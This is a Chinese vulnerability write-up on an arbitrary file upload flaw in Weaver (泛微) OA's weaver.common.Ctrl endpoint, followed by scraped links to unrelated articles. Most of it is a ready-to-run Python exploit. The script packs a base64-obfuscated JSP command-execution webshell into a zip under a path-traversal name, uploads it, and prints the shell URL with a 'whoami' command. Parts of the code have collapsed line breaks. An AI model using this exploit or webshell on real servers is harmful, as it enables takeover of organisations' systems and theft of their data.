使用需知

由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。
本文来源于PeiQi文库 ,作者PeiQi文库

一、漏洞描述

泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器

二、漏洞影响

泛微OA

三、漏洞复现

存在漏洞的路径为

/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

使用POC进行文件上传

python poc.py

四、漏洞POC

import zipfile
import random
import sys
import requestsdef generate_random_str(randomlength=16):random_str = ''base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'length = len(base_str) - 1for i in range(randomlength):random_str += base_str[random.randint(0, length)]return random_strmm = generate_random_str(8)webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1def file_zip():shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%if(request.getParameter("cmd")!=null){BASE64Decoder decoder = new BASE64Decoder();Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));Process e = (Process)rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(newString(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, newObject[]{}), request.getParameter("cmd") );java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>"""   ## 替换shell内容zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)zf.writestr(webshell_name2, shell)def GetShell(urllist):file_zip()# print('上传文件中')urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]try:requests.post(url=urls,files=file,timeout=60, verify=False)GetShellurl = urllist+'/cloudstore/'+webshell_name1GetShelllist = requests.get(url = GetShellurl)if GetShelllist.status_code == 200:print(GetShellurl+"?cmd=whoami")except:passGetShell("自己找的漏洞URL")

泛微OA 任意文件上传漏洞相关推荐

  1. php forms 上传更新json_通达OA任意文件上传漏洞详细分析

    影响 影响范围(但是只有V11版和2017版有包含文件的php,其余版本能上传文件.): V11版 2017版 2016版 2015版 2013增强版 2013版. 这个漏洞是几个月前的漏洞,主要是学 ...

  2. 泛微E-Office最新文件上传漏洞(CNVD-2021-49104)

    0x00  漏洞介绍 泛微e-office是泛微旗下的一款标准协同移动办公平台.主要面向中小企业.该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包, ...

  3. 泛微e-cology9前台文件上传漏洞复现

    目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现

  4. 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现

    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 利用方式 04 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.致远OA wpsAssistServ ...

  5. 通达OA任意文件上传/文件包含RCE漏洞分析

    通达OA任意文件上传/文件包含RCE漏洞分析 0x01 前提 0x01 漏洞介绍 0x02 漏洞分析 首先下载安装 绕过身份验证文件上传部分 变量传递问题 文件包含部分 0x01 前提 关于这个漏洞的 ...

  6. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  7. Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞

    漏洞名称:万户 OA OfficeServer.jsp 任意文件上传漏洞 English Name:ezOFFICE OA OfficeServer.jsp Arbitrarily File Uplo ...

  8. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  9. 通达+oa+php+文件+乱,通达OA 任意文件上传+文件包含导致RCE

    0x00 漏洞描述 ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入she ...

  10. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

最新文章

  1. JVM---虚拟机栈(操作数栈)
  2. 如果往错误的NEO地址转账会发生什么
  3. JStorm与Storm源码分析(二)--任务分配,assignment
  4. python construct 字符串_通过字符串变量在Python中设置和获取@property方法
  5. PHP调用新浪API 生成短链接
  6. 精简 opencv python_基于Python的OpenCV人脸检测!简直不要太简单!
  7. 操作系统——缓冲区溢出
  8. RAID阵列基础知识
  9. linux mysql 备份脚本_linux 之mysql备份脚本
  10. window10 物理网卡无法启用
  11. Cocos2dx------touch事件
  12. 5g组网sa方式的演进_关于5G的SA(独立组网)和NSA(非独立组网),这篇通俗易懂!
  13. 时间序列数据的特征提取
  14. UDS诊断基础知识简介-ISO14229
  15. pandas从时间序列中判断是一周的第几天或星期几
  16. Python 爬取豆瓣影片短评 生成词云统计
  17. Android 计时器
  18. win 10 显示未识别网络的 一种解决办法
  19. PostMan测试http请求
  20. vue——ViewModel 简易原理

热门文章

  1. 香港风景线 Byond 1993年采访
  2. Beyond compare4激活使用
  3. win7默认网关不可用怎么解决
  4. jquery利用ajax请求数据渲染二级菜单
  5. android 取消root,彻底告别安卓刷机时代!360超级ROOT正式宣布下线:取消ROOT权限
  6. c语言驻波,C版:基于声学驻波的液位检测方法C2-1(全文完整版)
  7. 计算机右键菜单太多,鼠标右键菜单选项太多:清理多余菜单选项的方法
  8. Android Behavior
  9. javascript基础常识问答(二)
  10. Linux系统命令行常识问答2